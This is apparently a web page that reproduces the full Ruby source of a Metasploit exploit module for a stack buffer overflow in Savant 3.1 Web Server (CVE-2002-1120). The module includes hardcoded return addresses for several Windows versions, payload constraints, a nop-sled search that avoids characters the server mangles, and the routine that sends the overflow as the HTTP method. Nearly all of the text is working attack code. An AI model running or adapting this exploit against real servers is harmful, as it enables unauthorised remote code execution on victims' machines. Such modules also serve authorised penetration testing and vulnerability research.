扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 |
## # $Id: savant_31_overflow.rb 10546 2010-10-04 20:53:51Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Savant\/3\.1/ ] } include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name'=> 'Savant 3.1 Web Server Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service supports a maximum of 10 threads (for a default install). Each exploit attempt generally causes a thread to die whether sucessful or not. Therefore, in a default configuration, you only have 10 chances. Due to the limited space available for the payload in this exploit module, use of the "ord" payloads is recommended. }, 'Author'=> [ 'patrick' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 10546 $', 'References'=> [ [ 'CVE', '2002-1120' ], [ 'OSVDB', '9829' ], [ 'BID', '5686' ], [ 'URL', 'http://www.milw0rm.com/exploits/787' ], ], 'Privileged'=> false, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 253, 'BadChars'=> "\x00\x0a\x0d\x25", 'StackAdjustment' => -3500, 'Compat'=> { 'ConnectionType' => '+ws2ord', }, }, 'Platform'=> ['win'], 'Targets' => [ # Patrick - Tested OK 2007/08/08 : w2ksp0, w2ksp4, xpsp2 en. [ 'Universal Savant.exe', { 'Ret' => 0x00417a96 } ], # p/r Savant.exe [ 'Windows 2000 Pro All - English', { 'Ret' => 0x750211aa } ], # p/r ws2help.dll [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2ac5 } ], # p/r ws2help.dll [ 'Windows 2000 Pro All - French',{ 'Ret' => 0x74fa36b2 } ], # p/r ws2help.dll [ 'Windows XP Pro SP2 - English', { 'Ret' => 0x71ab76ed } ], # p/r ws2help.dll ], 'DisclosureDate' => 'Sep 10 2002', 'DefaultTarget' => 0)) end def check info = http_fingerprint# check method if info and (info =~ /Savant\/3\.1/) return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe end def safe_nops(count) # We need to find a safe nop combination. # Savant will change some chars in the http method type - anything before the "/". # # For example, "GET /" will remain "GET /", however # "\xe0 /" will be modified to "\xc0 /" ... # "\xfe /" will be modified to "\xde /" ... # "\xff /" will be modified to "\x9f /" # The code after the "/" - our payload - is unchanged >=) # # Savant bad_chars for the nops bad_nop_chars = [*(0xe0..0xff)].pack("C*") nopsled = make_nops(count) # make_nops includes the payload bad_chars bad_nop_chars.each_byte { |badbyte| nopsled.each_byte { |goodbyte| if (goodbyte == badbyte) return false end } } return nopsled end def exploit print_status("Searching for a suitable nopsled...") findnop = safe_nops(24) # If we use short jump or make_nops(), sled will be corrupted. until findnop findnop = safe_nops(24) # If nops are banned, generate a new batch. end print_status("Found one! Sending exploit.") sploit = findnop + " /" + payload.encoded + [target['Ret']].pack('V') res = send_request_raw( { 'method'=> sploit, 'uri' => '/' }, 5) if (res) print_error('The server responded, that can\'t be good.') end handler end end |
体验盒子
